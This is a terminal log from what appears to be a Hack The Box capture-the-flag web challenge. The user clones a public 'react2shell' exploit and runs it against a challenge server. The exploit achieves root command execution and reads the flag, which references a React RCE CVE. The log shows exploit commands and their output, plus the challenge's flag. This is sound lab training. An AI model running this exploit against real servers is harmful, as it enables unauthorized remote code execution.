┌──(white㉿white)-[~/Documents/htb]
└─$ cd web_reactoops 
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops]
└─$ ls
build-docker.sh  challenge  Dockerfile
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops]
└─$ ./build-docker.sh 
Error response from daemon: No such container: web_reactoops
[+] Building 24.3s (5/15)                                                                                                                               docker:default
 => [internal] load build definition from Dockerfile                                                                                                              0.0s
 => => transferring dockerfile: 476B                                                                                                                              0.0s 
 => [internal] load metadata for docker.io/library/node:20-alpine                                                                                                 4.1s 
 => [internal] load .dockerignore                                                                                                                                 0.1s
 => => transferring context: 2B                                                                                                                                   0.0s 
 => CANCELED [ 1/11] FROM docker.io/library/node:20-alpine@sha256:fb4cd12c85ee03686f6af5362a0b0d56d50c58a04632e6c0fb8363f609372293                               20.0s 
 => => resolve docker.io/library/node:20-alpine@sha256:fb4cd12c85ee03686f6af5362a0b0d56d50c58a04632e6c0fb8363f609372293                                           0.0s
 => => sha256:6a0ac1617861a677b045b7ff88545213ec31c0ff08763195a70a4a5adda577bb 3.86MB / 3.86MB                                                                   11.0s
 => => sha256:4feea04c154301db6f4a496efa397b3db96603b1c009c797cfdde77bea8b3287 8.39MB / 43.23MB                                                                  20.0s
 => => sha256:b2cbbfe903b0821005780971ddc5892edcc4ce74c5a48d82e1d2b382edac3122 1.26MB / 1.26MB                                                                    8.4s
 => => sha256:fb4cd12c85ee03686f6af5362a0b0d56d50c58a04632e6c0fb8363f609372293 7.67kB / 7.67kB                                                                    0.0s
 => => sha256:afdf98210b07b586eb71fa22ba2e432e058e4cd1304d31ed60888755b8c865fb 1.72kB / 1.72kB                                                                    0.0s 
 => => sha256:11cedc39e663e7c5d5cb9cc77a461a0d2adc25537b94e6831a6108f09cb2001b 6.52kB / 6.52kB                                                                    0.0s 
 => => sha256:fff4e2c1b189bf87d63ad8bd07f7f4eb288d6f2b6a07a8bb44c60e8c075d2096 445B / 445B                                                                        8.9s 
 => => extracting sha256:6a0ac1617861a677b045b7ff88545213ec31c0ff08763195a70a4a5adda577bb                                                                         0.2s 
 => [internal] load build context                                                                                                                                 0.1s 
 => => transferring context: 13.92kB                                                                                                                              0.0s 
ERROR: failed to build: failed to solve: Canceled: context canceled                                                                                                    
Unable to find image 'web_reactoops:latest' locally
docker: Error response from daemon: pull access denied for web_reactoops, repository does not exist or may require 'docker login': denied: requested access to the resource is denied

Run 'docker run --help' for more information
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops]
└─$ git clone https://github.com/freeqaz/react2shell
cd react2shell
chmod +x exploit-redirect.sh
Cloning into 'react2shell'...
remote: Enumerating objects: 82, done.
remote: Counting objects: 100% (82/82), done.
remote: Compressing objects: 100% (65/65), done.
remote: Total 82 (delta 24), reused 74 (delta 16), pack-reused 0 (from 0)
Receiving objects: 100% (82/82), 126.12 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (24/24), done.
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops/react2shell]
└─$ ./exploit-redirect.sh 154.57.164.66:30455
[*] React2Shell Exploit - redirect exfil mode
[*] Target: 154.57.164.66:30455
[*] Command: id

[+] HTTP 303 - Redirect exfil successful
[+] Command output:
----------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
----------------------------------------
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops/react2shell]
└─$ ./exploit-redirect.sh 154.57.164.66:30455 "pwd"
[*] React2Shell Exploit - redirect exfil mode
[*] Target: 154.57.164.66:30455
[*] Command: pwd

[+] HTTP 303 - Redirect exfil successful
[+] Command output:
----------------------------------------
/app/.next/standalone
----------------------------------------
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops/react2shell]
└─$ ./exploit-redirect.sh 154.57.164.66:30455 "cat /app/flag.txt"
[*] React2Shell Exploit - redirect exfil mode
[*] Target: 154.57.164.66:30455
[*] Command: cat /app/flag.txt

[+] HTTP 303 - Redirect exfil successful
[+] Command output:
----------------------------------------
HTB{jus7_1n_c4s3_y0u_m1ss3d_r34ct2sh3ll___cr1t1c4l_un4uth3nt1c4t3d_RCE_1n_R34ct___CVE-2025-55182}
----------------------------------------
                                                                                                                                                                       
┌──(white㉿white)-[~/Documents/htb/web_reactoops/react2shell]
└─$ 
